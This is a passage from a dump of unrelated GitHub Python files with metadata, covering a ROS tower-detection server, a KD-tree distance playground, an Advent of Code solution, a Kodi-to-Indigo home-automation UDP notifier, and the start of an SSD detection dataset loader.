try:\n (trans, rot) = self.tf_listener.lookupTransform(\"/origin\", frame_id, rospy.Time(0))\n rospy.loginfo(\"%s => %s: (%f, %f, %f)\" % (\"/origin\", frame_id, trans[0], trans[1], trans[2]))\n self.tower_position[tower_name].x = trans[0]\n self.tower_position[tower_name].y = trans[1]\n self.tower_position[tower_name].z = trans[2]\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n rospy.logerr(\"failed to lookup transform: %s => %s\" % (\"/origin\", frame_id))\n def clusterNumCB(self, msg):\n self.cluster_num = msg.data\n def moveRobot(self, plate, from_tower, to_tower, from_height, to_height):\n robot_index = 0 #use the 1st robot 
first\n robot_frame_id = self.robotBaseFrameId(robot_index)\n rospy.loginfo(\"moving: %s from %s(%s) to %s(%s)\" % (self.resolvePlateName(plate), \n self.resolveTowerName(from_tower), self.resolvePlateHeight(from_height),\n self.resolveTowerName(to_tower), self.resolvePlateHeight(to_height)))\n from_target_position = self.tower_position[from_tower]\n to_target_position = self.tower_position[to_tower]\n self.robot_command(jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.ROBOT1,\n plate,\n from_tower, to_tower,\n jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.OPTION_NONE)\n # self.robot_server1(Header(), from_target_position, 0)\n # self.robot_server1(Header(), to_target_position, 1)\n def runMain(self):\n # first of all, resolve tf and store the position of the tower\n # but, we don't need to update `S' tower's position.\n # update the tf value\n self.updateTowerPosition(self.I_TOWER)\n self.updateTowerPosition(self.G_TOWER)\n self.state.updateState(State.MOVE_LARGE_S_G)\n self.moveRobot(self.PLATE_LARGE, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_HIGHEST, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_MIDDLE_S_I)\n self.moveRobot(self.PLATE_MIDDLE,\n self.S_TOWER, self.I_TOWER,\n self.PLATE_HEIGHT_MIDDLE, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_LARGE_G_I)\n self.moveRobot(self.PLATE_LARGE, \n self.G_TOWER, self.I_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_MIDDLE)\n \n self.state.updateState(State.MOVE_SMALL_S_G)\n self.moveRobot(self.PLATE_SMALL, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_LARGE_I_S)\n self.moveRobot(self.PLATE_LARGE, \n self.I_TOWER, self.S_TOWER, \n self.PLATE_HEIGHT_MIDDLE, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_MIDDLE_I_G)\n self.moveRobot(self.PLATE_MIDDLE, \n self.I_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_MIDDLE)\n \n self.state.updateState(State.MOVE_LARGE_S_G)\n self.moveRobot(self.PLATE_LARGE, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_HIGHEST)\n def pickupCB(self, req):\n target_index = req.tower_index\n # first of all, resolveing S, I and G name binding\n # S is the START tower\n # I is the INTERMEDIATE tower\n # G is the GOAL tower\n self.G_TOWER = req.tower_index\n # lookup I\n self.I_TOWER = (set([self.TOWER_LOWEST, self.TOWER_MIDDLE, self.TOWER_HIGHEST]) \n - set([self.G_TOWER, self.S_TOWER])).pop()\n\n # update the position of the tower\n self.state.updateState(State.MOVE_LARGE_S_G)\n self.state.publish()\n self.runMain()\n self.state.updateState(State.INITIAL)\n # update S\n self.S_TOWER = self.G_TOWER\n return TowerPickUpResponse()\n def checkCircleCB(self, req):\n (width, height) = cv.GetSize(self.cv_image)\n x = int(width * req.point.x)\n y = int(height * req.point.y)\n click_index = -1\n if self.checkColor(self.cv_image[y, x], self.color_indices[0]):\n click_index = self.TOWER_HIGHEST\n elif self.checkColor(self.cv_image[y, x], self.color_indices[1]):\n click_index = self.TOWER_MIDDLE\n elif self.checkColor(self.cv_image[y, x], self.color_indices[2]):\n click_index = self.TOWER_LOWEST\n if click_index == self.S_TOWER:\n msg = \"the tower the user clicked equals to the start tower\"\n rospy.logerr(msg)\n return CheckCircleResponse(False, click_index, msg)\n else:\n return CheckCircleResponse(click_index != -1, click_index, \"\")\n def checkColor(self, image_color, array_color):\n return (image_color[0] == 
array_color[0] and \n image_color[1] == array_color[1] and \n image_color[2] == array_color[2])\n def clickCB(self, msg):\n (width, height) = cv.GetSize(self.cv_image)\n # msg.x and msg.y is on a relative coordinate (u, v)\n x = int(width * msg.x)\n y = int(height * msg.y)\n output_str = str([x, y]) + \" - \" + str(self.cv_image[y, x])\n click_index = -1\n if self.checkColor(self.cv_image[y, x], self.color_indices[0]):\n output_str = output_str + \" cluster00 clicked\"\n click_index = self.TOWER_HIGHEST\n elif self.checkColor(self.cv_image[y, x], self.color_indices[1]):\n output_str = output_str + \" cluster01 clicked\"\n click_index = self.TOWER_MIDDLE\n elif self.checkColor(self.cv_image[y, x], self.color_indices[2]):\n output_str = output_str + \" cluster02 clicked\"\n click_index = self.TOWER_LOWEST\n self.browser_message_pub.publish(String(output_str))\n def imageCB(self, data):\n try:\n self.cv_image = self.bridge.imgmsg_to_cv(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n def publishState(self):\n self.state.publish()\n def spin(self):\n while not rospy.is_shutdown():\n for c in self.circles:\n c.publish()\n self.publishState()\n rospy.sleep(1.0)\n\ndef main():\n rospy.init_node(\"tower_detect_viewer_server\")\n server = TowerDetectViewerServer()\n server.spin()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jsk-ros-pkg/jsk_recognition","sub_path":"jsk_pcl_ros/scripts/tower_detect_viewer_server.py","file_name":"tower_detect_viewer_server.py","file_ext":"py","file_size_in_byte":13745,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"31"} +{"seq_id":"23777903278","text":"#!/usr/bin/env python\n\n# testing ground\n\nfrom scipy.spatial import cKDTree\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nfrom PIL import Image, ImageFilter\n\n# from pykdtree.kdtree import KDTree\n\n# gigapixel for the win\n\nImage.MAX_IMAGE_PIXELS = 10**9\n\n# the primary image (using smallest version for testing)\n\nimage = \"usa-raster-flat-5400.png\"\n\n# load the primary image and turn it into an array\n\nimMain = Image.open(image)\npixelsMain = np.array(imMain)\n\n# compute the latitudes and longitudes of the center of each pixel in degrees\n\nwidth, height = (imMain.size)\n\nprint(\"WH:\",width,height)\n\n# the - in lats is because the latitudes start at 90 and go down\n\n# the (180|360)/(height|width)/2 is to get the center of the pixel\n\nlats = -np.arange(-90, 90, 180./height)-180./height/2\nlngs = np.arange(-180, 180, 360./width)+360./width/2\n\n# convert to radians\n\nlats = lats/180*np.pi\nlngs = lngs/180*np.pi\n\n# meshgrid so we have lng and lat for each pixel\n\nlngs, lats = np.meshgrid(lngs, lats)\n\n# project these points into 3D space assuming Earth is a sphere; the unit here is Earth radii, so the radius of the sphere is 1 (for now)\n\nx = np.cos(lats)*np.cos(lngs)\ny = np.cos(lats)*np.sin(lngs)\nz = np.sin(lats)\n\n# reshape to a list of points\n\nptsAll = np.column_stack([x.flatten(), y.flatten(), z.flatten()])\n\n# find the boundary points' and then their pixel coordinates\n\nim = imMain.filter(ImageFilter.FIND_EDGES)\npixels = np.array(im)\nlit = np.where(pixels != 0)\n\n# take just the lit pixels from the 3D array we created earlier\n\nxLit = x[lit[0],lit[1]]\nyLit = y[lit[0],lit[1]]\nzLit = z[lit[0],lit[1]]\n\n# reshape the points and create a KDTree on them\n\npts3d = np.column_stack([xLit.flatten(), yLit.flatten(), zLit.flatten()])\n\n# tree = cKDTree(pts3d)\n\nprint(\"START\")\n\ntree = 
cKDTree(pts3d)\n\n# tree2 = cKDTree(ptsAll)\n\n# since all points are within distance 2 on the unit sphere, this doesn't place a restriction, but does speed up the queries\n\nres = tree.query(ptsAll, n_jobs=-1, distance_upper_bound=2)\n\nprint(\"END\")\n\n# def query_tree(point):\n# return tree.query(point, k=1)\n\n# from concurrent.futures import ProcessPoolExecutor\n# with ProcessPoolExecutor(max_workers=None) as executor:\n# res = executor.map(query_tree, ptsAll)\n\n# res2 = tree.sparse_distance_matrix(tree2, 1)\n\n# print(res2)\n\n# np.savetxt('/tmp/dist.txt', res[0])\n\n# np.save('/tmp/dist.npy', res[0])\n\n# these are the pixels that are white in the main image\n\n# litMain = np.where(pixelsMain != 0)\n\nexit(0)\n\n# these are the latitudes/longitudes of each pixel in the image\n\n# the top left pixel is 0,0\n\nlats = 90-180*(lit[0]+0.5)/height\n# lngs = 360*(lit[0]+0.5)/width.-180.\n\n# convert to radians\n\n\ngrid = 15\n\nlats = np.linspace(-90, 90, num=grid, endpoint=True)*np.pi/180\nlngs = np.linspace(-180, 180, num=grid, endpoint=True)*np.pi/180\n\nx = np.cos(lngs)*np.cos(lats)\ny = np.cos(lats)*np.sin(lngs)\nz = np.sin(lats)\n\nprint(\"Z\",z)\n\nptsGrid = np.column_stack([x, y, z])\n\nprint(ptsGrid.shape[0])\n\nfor i in range(np.shape(ptsGrid)[0]):\n pt = ptsGrid[i]\n# print(i, np.arcsin(pt[2])/np.pi*180, np.arctan2(pt[1], pt[0])/np.pi*180)\n\n# 1st 180 entries are lng = -180\n\n# 0th element is -90 south\n\n# y=0 means lng is 0, happens at 33123 but other places far away too\n\n# x=0 means lng is 90, happens at \n\nprint(time.time())\n\ndists, idxs = tree.query(ptsGrid)\n\nprint(np.shape(dists))\n\nfor i in range(dists.shape[0]):\n print(i, dists[i], ptsGrid[i])\n\ndists = np.reshape(dists, (grid, grid))\n\nidxs = np.reshape(idxs, (grid, grid))\n\nprint(dists)\n\nfor i in range(dists.shape[0]):\n for j in range(dists.shape[1]):\n lng = j*360/(grid-1)-180\n lat = i*180/(grid-1)-90\n dist = 8000*2*np.arcsin(dists[j][i]/2)\n idx = idxs[j][i]\n coords = pts3d[idxs[j][i]]\n latusa = np.arcsin(coords[2])\n lngusa = np.arctan2(coords[1], coords[0])\n print(lng, lat, dist, lngusa/np.pi*180, latusa/np.pi*180)\n\nexit(0)\n\nclose = np.where(dists < 0.001)\n\nprint(close)\n\n# min_distances = np.apply_along_axis(tree.query, 1, ptsGrid)\n\n# print(min_distances)\n\nprint(time.time())\n\ndata = np.reshape(dists, (180, 360))\n\nfig, ax = plt.subplots()\n\nax.imshow(data, cmap='rainbow')\n\nfig.savefig(\"random_image.png\")\n","repo_name":"barrycarter/PolygonDistances","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12053374195","text":"import sys\nsys.path.append(\"../2020\")\nimport utils.utils as utils\n\ndef tick(grid):\n \"\"\"\n A light which is on stays on when 2 or 3 neighbors are on, and turns off otherwise.\n A light which is off turns on if exactly 3 neighbors are on, and stays off otherwise.\n \"\"\"\n next_grid = {}\n for y in grid:\n next_grid[y] = {}\n for x in grid[y]:\n ct = 0\n for yi in (y-1, y, y+1):\n if yi in grid:\n ya = grid[yi]\n for xi in (x-1, x, x+1):\n if not (xi == x and yi == y):\n if xi in ya:\n if ya[xi] == \"#\":\n ct += 1\n if grid[y][x] == \"#\":\n if ct == 2 or ct == 3:\n next_grid[y][x] = \"#\"\n else:\n next_grid[y][x] = \".\"\n else:\n if ct == 3:\n next_grid[y][x] = \"#\"\n else:\n next_grid[y][x] = \".\"\n\n return next_grid\n\ndef test_day_eighteen():\n grid = 
utils.file_to_grid(\"Day18sample.txt\")\n for i in range(0, 4):\n grid = tick(grid)\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef test_day_eighteen_part_two():\n grid = utils.file_to_grid(\"Day18sample.txt\")\n grid[0][0] = \"#\"\n grid[0][5] = \"#\"\n grid[5][0] = \"#\"\n grid[5][5] = \"#\"\n for i in range(0, 5):\n grid = tick(grid)\n grid[0][0] = \"#\"\n grid[0][5] = \"#\"\n grid[5][0] = \"#\"\n grid[5][5] = \"#\"\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef day_eighteen():\n grid = utils.file_to_grid(\"Day18.txt\")\n for i in range(0, 100):\n grid = tick(grid)\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef day_eighteen_part_two():\n grid = utils.file_to_grid(\"Day18.txt\")\n grid[0][0] = \"#\"\n grid[0][99] = \"#\"\n grid[99][0] = \"#\"\n grid[99][99] = \"#\"\n for i in range(0, 100):\n grid = tick(grid)\n grid[0][0] = \"#\"\n grid[0][99] = \"#\"\n grid[99][0] = \"#\"\n grid[99][99] = \"#\"\n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\nif __name__==\"__main__\":\n test_day_eighteen()\n day_eighteen()\n test_day_eighteen_part_two()\n day_eighteen_part_two()","repo_name":"dratcliff/advent-of-code","sub_path":"aoc-old/2015/Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32659680642","text":"###############################################################################\n# This Addon:\n# Inspired by \"XBMCState Vera Plugin XBMC Addon\"\n# Thanks to chixxi for the vera plugin and jordan Hackworth for the script idea\n# http://www.jordanhackworth.com/home-automation-with-xbmc/\n# http://windowsmediacenter.blogspot.co.uk/2013/02/xbmc-vera-home-automationbasic.html\n# http://apps.mios.com/plugin.php?id=3346\n###############################################################################\n\n###############################################################################\n# XBMC Reference\n#\n# http://mirrors.xbmc.org/docs/python-docs/frodo/\n# https://github.com/xbmc/xbmc/blob/master/xbmc/interfaces/json-rpc/PlayerOperations.cpp \n# https://github.com/xbmc/xbmc/blob/master/xbmc/cores/IPlayerCallback.h \n# https://github.com/xbmc/xbmc/blob/master/xbmc/guilib/WindowIDs.h\n# https://github.com/jaredquinn/xbmcshell/blob/master/xbmcshell\n###############################################################################\n\nimport sys\nimport xbmc\nimport xbmcgui \nimport xbmcaddon\nimport time\nimport socket\nimport json\nimport re\n\nsettings = xbmcaddon.Addon(id='service.indigo')\nindigo_ip = settings.getSetting( \"indigo_ip\" )\nindigo_port = settings.getSetting( \"indigo_port\" )\n\ndebouncing_video = 0 #float(settings.getSetting( \"debounce_video\"))\ndebouncing_audio = 0 #float(settings.getSetting( \"debounce_audio\"))\n\n__addonname__ = settings.getAddonInfo('name')\n__icon__ = settings.getAddonInfo('icon')\n\nplugin_start = \"Plugin started\"\nplugin_error = \"Please insert Indigo information in the addon setting\"\ntime1 = 5000\ntime2 = 3000\n\nsock = None\ndebugMode = False\nsettingsOK = False\nlastMedia = \"\"\nlastMenu = \"\"\nlastTitle = \"\"\nlastVolume = 0\n\nlastMuted = False\ncurrMedia = \"\"\ncurrTitle = \"\"\ncurrVolume = 0\ncurrMuted = False\nlastWindow = 0\npulseMax = 15\npulseAlive = 0\n\nMAJOR = 0\nMINOR = 0\nDHARMA = False \nEDEN = 
False\nFRODO = False\nGOTHAM = False\nHELIX = False\nISENGARD = False\nJARVIS = False\n \n\ndef get_installedversion():\n #http://www.tayunsmart.com/otaupdate/xbmc/s9/addons/plugin.program.super.favourites/utils.py\n version_installed = []\n\n xQuery = xbmc.executeJSONRPC('{ \"jsonrpc\": \"2.0\", \"method\": \"Application.GetProperties\", \"params\": {\"properties\": [\"version\", \"name\"]}, \"id\": 1 }')\n xQuery = unicode(xQuery, 'utf-8', errors='ignore')\n xQuery = json.loads(xQuery)\n \n if xQuery.has_key('result') and xQuery['result'].has_key('version'):\n version_installed = xQuery['result']['version']\n\n return version_installed\n\ndef debugLog (message):\n global debugMode\n if debugMode == True:\n print('Indigo.Service: ' + message) \n\ndef errorLog (message):\n print('Indigo.Service.ERROR: ' + message) \n\ndef indigoSendMsg(message):\n global sock\n try:\n sock.sendto (message, (indigo_ip , int(indigo_port)))\n debugLog ('Sent message to Indigo: ' + message) \n except socket.error:\n errorLog ('indigoSendMsg. Socket error: ' + str(sys.exc_info()[1][0]) + ',' + str(sys.exc_info()[1][1] ))\n\ndef notifyEventApp(event):\n debugLog ('notifyEventApp(' + event + ')') \n event = event.lower()\n message = 'app'\n message = message + '' + event + ''\n indigoSendMsg(message)\n\ndef notifyEventPlayer(event, media):\n global currTitle\n global currVolume\n debugLog ('notifyEventPlayer(' + event + ',' + media + ')')\n event = event.lower() \n message = 'player'\n message = message + '' + event + ''\n message = message + '' + media + ''\n message = message + '' + currTitle + ''\n indigoSendMsg(message)\n\ndef notifyEventMenu(event): \n debugLog ('notifyEventMenu(' + event + ')')\n event = event.lower()\n message = 'menu'\n message = message + '' + event + ''\n indigoSendMsg(message)\n \ndef notifyEventVolume(volume,muted): \n debugLog ('notifyEventVolume(' + str(volume) + ')')\n message = 'volume'\n message = message + '' + str(volume) + ''\n message = message + '' + str(muted).lower() + ''\n indigoSendMsg(message)\n\ndef notifyEventTitle(title): \n debugLog ('notifyEventTitle(' + title + ')')\n title = title.strip()\n if title == '':\n title = '.'\n message = 'title'\n message = message + '' + title + ''\n indigoSendMsg(message)\n\ndef checkEventMenu(event):\n global lastMenu\n if event != lastMenu:\n debugLog ('Menu changed from ' + lastMenu + ' to ' + event) \n notifyEventMenu (event)\n lastMenu = event\n\ndef checkEventVolume():\n global lastVolume\n global lastMuted\n\n xVolume = 0\n xMute = False\n\n xVolume, xMuted = getCurrentVolume()\n if (xVolume != lastVolume) or (xMuted != lastMuted):\n notifyEventVolume(xVolume,xMuted)\n\n lastVolume = xVolume\n lastMuted = xMuted\n\ndef checkEventTitle():\n global currTitle\n\n if xbmc.Player().isPlaying(): \n xTitle = getCurrentMediaTitle()\n if (xTitle != currTitle) :\n notifyEventTitle(xTitle)\n currTitle = xTitle\n\ndef getCurrentMediaType():\n global lastMenu\n global lastWindow\n\n lMedia = 'none'\n lWindow = xbmcgui.getCurrentWindowId()\n\n if xbmc.Player().isPlaying(): \n if xbmc.Player().isPlayingVideo():\n if xbmc.getCondVisibility('VideoPlayer.Content(episodes)'): \n if xbmc.getInfoLabel('VideoPlayer.Season') != \"\" and xbmc.getInfoLabel('VideoPlayer.TVShowTitle') != \"\":\n lMedia = 'tvshow' \n if xbmc.getCondVisibility('VideoPlayer.Content(livetv)'): \n lMedia = 'livetv' \n if lMedia == 'none': \n lMedia = 'video'\n if lWindow == 10614:\n lMedia = 'livetv'\n #if xbmc.Pvr().IsPlayingTv(): \n # lMedia = 'livetv' \n if 
xbmc.Player().isPlayingAudio():\n if xbmc.getCondVisibility('VideoPlayer.Content(livetv)'): \n lMedia = 'radio'\n else:\n lMedia = 'audio' \n if lWindow > 10613 and lWindow <= 10618:\n lMedia = 'livetv' \n if lWindow >= 10694 and lWindow <= 10699:\n lMedia = 'livetv' \n if lastMenu == 'livetv':\n lMedia = 'livetv' \n \n return lMedia\n\ndef getCurrentVolume():\n xQuery = ''\n xResult = ''\n xVolume = 0\n xMuted = False\n\n try:\n xQuery = '{\"jsonrpc\": \"2.0\", \"method\": \"Application.GetProperties\", \"params\": { \"properties\": [ \"volume\", \"muted\" ] }, \"id\": 1}'\n xResult = xbmc.executeJSONRPC( xQuery )\n xMatch = re.search( '\"volume\": ?([0-9]{1,3})', xResult )\n xVolume = int(xMatch.group(1)) \n if bool (re.search ('\"muted\": true',xResult)):\n xMuted = True\n except:\n xVolume = lastVolume\n xMuted = lastMuted\n pass\n\n return xVolume, xMuted\n\n\ndef getCurrentMediaTitle():\n lTitle = '' \n try:\n lMedia = getCurrentMediaType()\n if lMedia == 'tvshow':\n lTitle = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')\n if lTitle > '':\n lTitle = lTitle + ': ' + xbmc.getInfoLabel('VideoPlayer.Title') \n if lMedia == 'livetv':\n lTitle = xbmc.getInfoLabel('VideoPlayer.ChannelName') \n if lTitle > '':\n lTitle = lTitle + ': ' + xbmc.getInfoLabel('VideoPlayer.Title') \n if lMedia == 'radio':\n lTitle = xbmc.getInfoLabel('MusicPlayer.ChannelName')\n if lTitle == '': \n if xbmc.Player().isPlaying(): \n if xbmc.Player().isPlayingVideo():\n lTitle = xbmc.getInfoLabel('VideoPlayer.Title') \n if xbmc.Player().isPlayingAudio():\n lTitle = xbmc.getInfoLabel('MusicPlayer.Title')\n except:\n lTitle = ''\n lTitle = lTitle.replace('<', '')\n lTitle = lTitle.replace('>', '')\n lTitle = lTitle.replace('&', '')\n return lTitle\n\ndef watchNavigation():\n global lastMedia\n global lastMenu\n global lastWindow\n global lastVolume\n global lastMuted\n\n checkEventVolume()\n checkEventTitle()\n\n currWindow = (xbmcgui.getCurrentWindowId())\n if lastWindow == currWindow:\n return\n lastWindow = currWindow\n debugLog ('Current Window ID = ' + str(currWindow))\n \n # menu Home\n if currWindow == 10000:\n checkEventMenu ('home')\n if currWindow == 10001:\n checkEventMenu ('program')\n if currWindow == 10002:\n checkEventMenu ('picture')\n\n # menu Sistema \n if currWindow == 10004:\n checkEventMenu ('settings')\n if currWindow == 10007:\n checkEventMenu ('settings')\n if (currWindow >= 10012) and (currWindow <= 10019):\n checkEventMenu ('settings')\n if currWindow == 10021:\n checkEventMenu ('settings') \n\n # menu PVR\n if (currWindow >= 10601) and (currWindow <= 10626):\n checkEventMenu ('livetv')\n \n # menu Video\n if currWindow == 10006:\n checkEventMenu ('video')\n if currWindow == 10024:\n checkEventMenu ('video')\n if currWindow == 10025:\n checkEventMenu ('video')\n if currWindow == 10028:\n checkEventMenu ('video')\n\n # Menu audio \n if currWindow == 10005:\n checkEventMenu ('music')\n if currWindow == 10500:\n checkEventMenu ('music')\n if currWindow == 10501:\n checkEventMenu ('music')\n if currWindow == 10502:\n checkEventMenu ('music')\n\n # Menu Meteo\n if currWindow == 12600:\n checkEventMenu ('weather')\n\n lastWindow = currWindow\n\n#class MyApplication(xbmc.Application): \n \n# def __init__ (self): \n# xbmc.Application.__init__(self) \n\n# def OnVolumeChanged \n\nclass MyPlayer(xbmc.Player): \n def __init__ (self): \n xbmc.Player.__init__(self) \n debugLog ('Player init') \n \n def onPlayBackStarted(self):\n global currMedia\n global currTitle\n\n xbmc.sleep (250)\n media = 
getCurrentMediaType()\n currTitle = getCurrentMediaTitle() \n notifyEventPlayer ('onPlayBackStarted',media)\n currMedia = media\n\n def onPlayBackEnded(self): \n global currMedia\n if (currMedia == \"video\") or (currMedia == 'tvshow'):\n time.sleep(debouncing_video)\n if not xbmc.Player().isPlaying(): \n notifyEventPlayer ('onPlayBackEnded',currMedia)\n\n if (currMedia == \"audio\"):\n time.sleep(debouncing_audio)\n if not xbmc.Player().isPlaying():\n notifyEventPlayer ('onPlayBackEnded',currMedia)\n currMedia = 'none' \n currTitle = \"\"\n \n def onPlayBackStopped(self):\n global currMedia\n global currTitle\n notifyEventPlayer ('onPlayBackStopped',currMedia) \n currTitle = \"\" \n currMedia = \"none\" \n \n def onPlayBackPaused(self): \n global currMedia \n notifyEventPlayer ('onPlayBackPaused',currMedia) \n \n def onPlayBackResumed(self):\n global currMedia\n notifyEventPlayer ('onPlayBackResumed',currMedia)\n \n def OnQueueNextItem(self):\n debugLog ('Player.OnQueueNextItem') \n \n def onPlayBackEnded(self, time):\n debugLog ('Player.onPlayBackEnded') \n \n def onPlayBackSeek(self, time, seekOffset):\n debugLog ('Player.onPlayBackSeek')\n \n def onPlayBackSeekChapter(self, chapter):\n debugLog ('Player.onPlayBackSeekChapter') \n\nclass MyMonitor( xbmc.Monitor ):\n def __init__( self, *args, **kwargs ):\n xbmc.Monitor.__init__( self )\n debugLog ('Monitor.init') \n \n def onSettingsChanged( self ):\n #settings.start()\n #if not settings.reconnect:\n # check_state()\n debugLog ('Monitor.onSettingsChanged') \n\n def onScreensaverDeactivated( self ): \n debugLog ('Monitor.onScreensaverDeactivated') \n \n def onScreensaverActivated( self ): \n debugLog ('Monitor.onScreensaverActivated') \n \n \n\n###################################################### \n# Inicio del Addon\n######################################################\n\nif (str(settings.getSetting(\"debug_mod\")) == \"Yes\"):\n debugMode = True\nelse:\n debugMode = False\n\ndebugLog ('Service starts')\n\ntry: \n version_installed = get_installedversion() \n if version_installed.has_key('major'):\n MAJOR = int(version_installed['major'])\n MINOR = int(version_installed['minor'])\nexcept:\n MAJOR = 0 \n MINOR = 0\n\ndebugLog ('Kodi release = ' + str(MAJOR) + '.' + str(MINOR)) \n\nDHARMA = (MAJOR < 11) \nEDEN = (MAJOR == 11)\nFRODO = (MAJOR == 12) and (MINOR < 9)\nGOTHAM = (MAJOR == 13) or (MAJOR == 12 and MINOR == 9)\nHELIX = (MAJOR == 14)\nISENGARD = (MAJOR == 15)\nJARVIS = (MAJOR > 15)\n\nif DHARMA:\n debugLog ('Kodi release = Dharma')\nif FRODO:\n debugLog ('Kodi release = Frodo')\nif GOTHAM:\n debugLog ('Kodi release = Gotham')\nif HELIX:\n debugLog ('Kodi release = Helix')\nif ISENGARD:\n debugLog ('Kodi release = Isengard')\nif JARVIS:\n debugLog ('Kodi release = Jarvis')\n\n\nlastMedia = \"none\"\nlastMenu = \"none\"\nlastTitle = \"\"\ncurrMedia = \"none\"\nlastWindow = 0\n\nsettingsOK = True\nif (indigo_ip == \"0.0.0.0\") or (indigo_ip == \"\"):\n settingsOK = False\n errorLog ('Settings: Indigo IP address is empty')\nif int(indigo_port <= 0): \n settingsOK = False\n errorLog ('Settings: Indigo UDP Port is empty')\n\nif (str(settings.getSetting(\"notification\")) == \"Yes\"):\n if settingsOK == False: \n xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,plugin_error, time1, __icon__))\n else:\n xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,plugin_start, time2, __icon__))\n\nif settingsOK == False:\n errorLog ('indigoSendMsg. Exit. 
Settings are not Ok')\n sys.exit()\n\nplayer = MyPlayer() \nmonitor = MyMonitor() \n\n#########################################################\n# This socket uses DataGram. (UDP connectionless)\n#########################################################\n\ntry:\n debugLog ('Creating socket')\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n debugLog ('Socket created')\nexcept socket.error:\n errorLog ('Socket error: ' + indigo_ip + \":\" + indigo_port + ' ... ' + str(sys.exc_info()[1][1] ))\n pass\n\n#########################################################\n# Bucle principal\n#########################################################\n\nif sock != None:\n lastVolume, lastMuted = getCurrentVolume()\n notifyEventApp('start')\n notifyEventVolume(lastVolume,lastMuted)\n if DHARMA or EDEN or FRODO or GOTHAM:\n while (not xbmc.abortRequested):\n watchNavigation()\n xbmc.sleep(300)\n if HELIX or ISENGARD or JARVIS:\n while (not monitor.abortRequested()):\n if monitor.waitForAbort(0.3):\n break\n pulseAlive = pulseAlive + 1\n if pulseAlive > pulseMax:\n notifyEventApp('alive')\n pulseAlive = 0 \n watchNavigation() \n \n notifyEventApp('quit')\ndebugLog ('Service quits')\n\n\n","repo_name":"tenallero/Indigo-XBMC","sub_path":"KodiService/service.indigo/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":17852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36321712135","text":"# put your python code here\nwalk_hours = int(input())\nwalk_minutes = int(input())\nwalk_seconds = int(input())\nrain_hours = int(input())\nrain_minutes = int(input())\nrain_seconds = int(input())\nwalk_time = walk_hours*3600 + walk_minutes*60 + walk_seconds\nrain_time = rain_hours*3600 + rain_minutes*60 + rain_seconds\nprint(rain_time - walk_time)\n","repo_name":"kb1hyr/Simple_Chatty_Bot","sub_path":"Problems/Difference of times/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70304722969","text":"# !/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n# File : ssd_dataset.py\n# Author :CodeCat\n# version :python 3.7\n# Software :Pycharm\n\"\"\"\nfrom cv2 import cv2\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nfrom .data_utils import cvtColor, preprocess_input\n\n\nclass SSDDataset(Dataset):\n def __init__(\n self,\n annotation_lines,\n input_shape,\n anchors,\n num_classes,\n train,\n overlap_threshold=0.5\n ):\n super(SSDDataset, self).__init__()\n self.annotation_lines = annotation_lines\n self.input_shape = input_shape\n self.anchors = anchors\n self.num_anchors = len(anchors)\n self.num_classes = num_classes\n self.train = train\n self.overlap_threshold = overlap_threshold\n\n def __len__(self):\n return len(self.annotation_lines)\n\n def __getitem__(self, index):\n index = index % len(self.annotation_lines)\n # image: 300x300x3; box: (num_box, 5)\n # 5: xmin, y_min, x_max, y_max, class_idx\n image, box = self.get_random_data(self.annotation_lines[index], self.input_shape, is_image_enhance=self.train)\n # image: 3x300x300\n image_data = np.transpose(preprocess_input(np.array(image, dtype=np.float32)), (2, 0, 1))\n if len(box) != 0:\n # 取出真实框的位置信息\n boxes = np.array(box[:, :4], dtype=np.float32)\n # 归一化处理\n boxes[:, [0, 2]] /= self.input_shape[1]\n boxes[:, [1, 3]] /= self.input_shape[0]\n # 对真实框的种类进行one hot处理,\n one_hot_label = 
